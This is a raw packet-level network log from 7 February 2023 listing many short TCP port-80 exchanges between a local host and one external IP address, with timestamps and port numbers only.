Feb 7, 2023 19:57:57.498948097 CET	80	49893	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:57.499085903 CET	49893	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.612272024 CET	49893	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.613151073 CET	49894	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.673708916 CET	80	49894	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:57.673815012 CET	49894	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.674490929 CET	80	49893	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:57.674577951 CET	49893	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.677143097 CET	49894	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.737766027 CET	80	49894	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:57.739999056 CET	80	49894	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:57.742136955 CET	49894	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.856055975 CET	49894	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.856880903 CET	49895	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.916778088 CET	80	49894	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:57.916901112 CET	49894	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.918325901 CET	80	49895	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:57.918442011 CET	49895	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.922450066 CET	49895	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.983916044 CET	80	49895	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:57.986884117 CET	80	49895	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:57.986993074 CET	49895	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.107280970 CET	49895	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.108107090 CET	49896	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.168831110 CET	80	49895	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:58.168929100 CET	49895	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.169605017 CET	80	49896	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:58.169723988 CET	49896	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.170170069 CET	49896	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.234816074 CET	80	49896	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:58.235466957 CET	80	49896	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:58.235646963 CET	49896	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.353691101 CET	49896	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.354707956 CET	49897	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.415484905 CET	80	49896	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:58.415887117 CET	49896	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.416006088 CET	80	49897	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:58.416270971 CET	49897	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.416672945 CET	49897	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.477861881 CET	80	49897	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:58.480139971 CET	80	49897	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:58.482439041 CET	49897	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.588589907 CET	49897	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.589538097 CET	49898	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.650162935 CET	80	49897	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:58.650716066 CET	80	49898	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:58.650823116 CET	49897	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.650907993 CET	49898	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.651415110 CET	49898	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.712713003 CET	80	49898	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:58.716058969 CET	80	49898	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:58.718760967 CET	49898	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.823203087 CET	49898	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.823368073 CET	49899	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.884502888 CET	80	49898	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:58.884531975 CET	80	49899	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:58.884649038 CET	49898	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.884699106 CET	49899	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.885147095 CET	49899	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:58.946484089 CET	80	49899	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:58.948884010 CET	80	49899	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:58.949063063 CET	49899	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.057526112 CET	49899	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.058567047 CET	49900	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.119080067 CET	80	49899	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:59.120862961 CET	80	49900	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:59.120964050 CET	49899	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.121020079 CET	49900	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.126281977 CET	49900	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.188874960 CET	80	49900	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:59.192604065 CET	80	49900	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:59.194747925 CET	49900	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.307578087 CET	49900	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.308451891 CET	49901	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.369179964 CET	80	49901	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:59.369383097 CET	49901	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.369719028 CET	49901	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.370045900 CET	80	49900	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:59.370122910 CET	49900	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.430188894 CET	80	49901	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:59.432867050 CET	80	49901	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:59.433020115 CET	49901	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.542423964 CET	49901	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.543422937 CET	49902	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.603354931 CET	80	49901	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:59.603490114 CET	49901	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.604823112 CET	80	49902	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:59.604943991 CET	49902	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.605442047 CET	49902	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.666812897 CET	80	49902	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:59.669460058 CET	80	49902	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:59.669564009 CET	49902	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.775965929 CET	49902	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.776880026 CET	49903	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.837682962 CET	80	49902	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:59.837851048 CET	49902	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.838399887 CET	80	49903	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:59.838514090 CET	49903	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.838875055 CET	49903	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:59.900410891 CET	80	49903	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:59.903177977 CET	80	49903	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:59.903387070 CET	49903	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.020663023 CET	49903	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.021605015 CET	49904	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.082766056 CET	80	49903	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:00.083026886 CET	49903	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.083174944 CET	80	49904	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:00.083328962 CET	49904	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.083812952 CET	49904	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.145339966 CET	80	49904	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:00.148993015 CET	80	49904	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:00.149136066 CET	49904	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.261949062 CET	49904	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.262671947 CET	49905	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.323848963 CET	80	49904	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:00.324064016 CET	49904	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.324425936 CET	80	49905	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:00.324543953 CET	49905	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.330108881 CET	49905	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.391995907 CET	80	49905	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:00.394474030 CET	80	49905	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:00.394674063 CET	49905	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.510977983 CET	49905	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.512193918 CET	49906	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.572992086 CET	80	49905	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:00.573120117 CET	49905	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.573703051 CET	80	49906	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:00.573797941 CET	49906	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.574286938 CET	49906	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.635646105 CET	80	49906	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:00.639369011 CET	80	49906	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:00.639687061 CET	49906	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.769835949 CET	49906	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.770874977 CET	49907	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.831341028 CET	80	49907	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:00.831401110 CET	80	49906	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:00.831496000 CET	49907	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.831542969 CET	49906	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.832041025 CET	49907	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:00.892352104 CET	80	49907	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:00.895706892 CET	80	49907	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:00.895833015 CET	49907	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.011034966 CET	49907	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.011724949 CET	49908	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.071639061 CET	80	49907	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:01.071882963 CET	49907	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.073154926 CET	80	49908	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:01.073369980 CET	49908	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.073848963 CET	49908	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.136826992 CET	80	49908	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:01.140189886 CET	80	49908	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:01.140316963 CET	49908	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.246145964 CET	49908	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.247133017 CET	49909	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.307847977 CET	80	49908	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:01.307986975 CET	49908	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.308541059 CET	80	49909	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:01.308641911 CET	49909	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.309253931 CET	49909	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.370721102 CET	80	49909	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:01.374006987 CET	80	49909	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:01.374197960 CET	49909	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.479258060 CET	49909	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.480351925 CET	49910	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.540848017 CET	80	49909	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:01.542565107 CET	49909	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.542640924 CET	80	49910	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:01.542782068 CET	49910	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.546921015 CET	49910	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.609242916 CET	80	49910	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:01.612700939 CET	80	49910	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:01.612833023 CET	49910	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.730063915 CET	49910	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.731013060 CET	49911	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.792474985 CET	80	49911	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:01.792507887 CET	80	49910	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:01.794028044 CET	49911	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.794025898 CET	49910	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.794028044 CET	49911	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.855534077 CET	80	49911	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:01.858113050 CET	80	49911	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:01.858611107 CET	49911	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.964035034 CET	49911	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:01.965250015 CET	49912	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.025573969 CET	80	49912	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:02.025696993 CET	49912	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.025749922 CET	80	49911	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:02.025830030 CET	49911	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.026160955 CET	49912	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.087323904 CET	80	49912	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:02.091125965 CET	80	49912	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:02.091248989 CET	49912	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.203382969 CET	49912	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.204348087 CET	49913	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.264339924 CET	80	49912	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:02.265610933 CET	80	49913	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:02.265824080 CET	49912	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.265825987 CET	49913	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.266315937 CET	49913	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.327728987 CET	80	49913	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:02.329956055 CET	80	49913	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:02.330144882 CET	49913	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.448602915 CET	49913	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.449601889 CET	49914	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.510394096 CET	80	49913	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:02.510646105 CET	49913	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.511801958 CET	80	49914	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:02.515239000 CET	49914	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.515564919 CET	49914	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.577779055 CET	80	49914	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:02.581130028 CET	80	49914	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:02.581233025 CET	49914	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.718456984 CET	49914	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.720025063 CET	49915	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.780495882 CET	80	49915	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:02.780708075 CET	49915	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.780720949 CET	80	49914	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:02.781027079 CET	49914	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.781708002 CET	49915	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.842047930 CET	80	49915	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:02.844913006 CET	80	49915	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:02.847557068 CET	49915	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.970483065 CET	49915	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:02.971127987 CET	49916	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:03.031548023 CET	80	49916	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:03.031758070 CET	80	49915	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:03.031954050 CET	49915	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:03.032697916 CET	49916	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:03.032699108 CET	49916	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:03.093430996 CET	80	49916	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:03.096664906 CET	80	49916	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:03.098983049 CET	49916	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:03.216608047 CET	49916	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:03.217921019 CET	49917	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:03.276254892 CET	80	49916	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:03.276376009 CET	49916	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:03.278075933 CET	80	49917	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:03.278198957 CET	49917	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:03.280189037 CET	49917	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:03.340383053 CET	80	49917	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:03.342660904 CET	80	49917	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:03.342789888 CET	49917	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:03.453521013 CET	49917	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:03.454591990 CET	49918	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:03.515094042 CET	80	49918	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:03.515136957 CET	80	49917	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:03.515429020 CET	49917	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:03.515430927 CET	49918	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:03.708586931 CET	49918	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:03.769062996 CET	80	49918	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:03.772363901 CET	80	49918	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:03.772547007 CET	49918	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:03.889136076 CET	49918	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:03.889915943 CET	49919	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:03.949140072 CET	80	49918	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:03.949259043 CET	49918	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:03.952554941 CET	80	49919	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:03.952717066 CET	49919	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:03.999927044 CET	49919	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:04.062500954 CET	80	49919	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:04.066329956 CET	80	49919	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:04.066504002 CET	49919	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:04.219964027 CET	49919	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:04.220781088 CET	49920	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:04.281076908 CET	80	49920	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:04.281239986 CET	49920	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:04.282438993 CET	80	49919	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:04.282565117 CET	49919	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:04.285165071 CET	49920	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:04.346069098 CET	80	49920	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:04.347853899 CET	80	49920	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:04.347996950 CET	49920	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:04.488692045 CET	49920	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:04.489543915 CET	49921	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:04.549825907 CET	80	49920	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:04.550009966 CET	49920	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:04.550756931 CET	80	49921	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:04.550905943 CET	49921	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:04.595004082 CET	49921	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:04.655736923 CET	80	49921	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:04.658869982 CET	80	49921	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:04.659040928 CET	49921	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:06.006795883 CET	49921	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:06.007658958 CET	49922	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:06.068397045 CET	80	49921	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:06.068505049 CET	49921	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:06.069212914 CET	80	49922	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:06.069331884 CET	49922	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:06.074309111 CET	49922	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:06.137280941 CET	80	49922	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:06.138298988 CET	80	49922	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:06.138453960 CET	49922	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:06.319061995 CET	49922	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:06.331125021 CET	49923	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:06.379559994 CET	80	49922	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:06.379770041 CET	49922	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:06.392831087 CET	80	49923	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:06.392935991 CET	49923	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:06.395394087 CET	49923	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:06.457087040 CET	80	49923	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:06.459228992 CET	80	49923	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:06.459403038 CET	49923	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:06.794784069 CET	49923	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:06.795777082 CET	49924	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:06.856498957 CET	80	49923	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:06.856693983 CET	49923	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:06.858369112 CET	80	49924	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:06.858529091 CET	49924	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:07.066104889 CET	49924	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:07.128787041 CET	80	49924	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:07.132631063 CET	80	49924	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:07.132837057 CET	49924	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:07.376266956 CET	49924	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:07.377181053 CET	49925	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:07.438879967 CET	80	49924	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:07.438920021 CET	80	49925	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:07.439071894 CET	49924	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:07.439146042 CET	49925	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:07.476078033 CET	49925	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:07.537861109 CET	80	49925	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:07.540460110 CET	80	49925	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:07.540596008 CET	49925	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:07.656446934 CET	49925	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:07.657460928 CET	49926	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:07.718548059 CET	80	49925	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:07.718630075 CET	49925	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:07.719589949 CET	80	49926	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:07.719679117 CET	49926	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:07.720136881 CET	49926	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:07.782255888 CET	80	49926	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:07.785341024 CET	80	49926	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:07.785470963 CET	49926	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:07.905785084 CET	49926	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:07.907666922 CET	49927	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:07.968241930 CET	80	49926	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:07.968427896 CET	49926	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:07.968995094 CET	80	49927	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:07.969130993 CET	49927	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:07.969609022 CET	49927	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.030905008 CET	80	49927	62.204.41.4	192.168.2.5
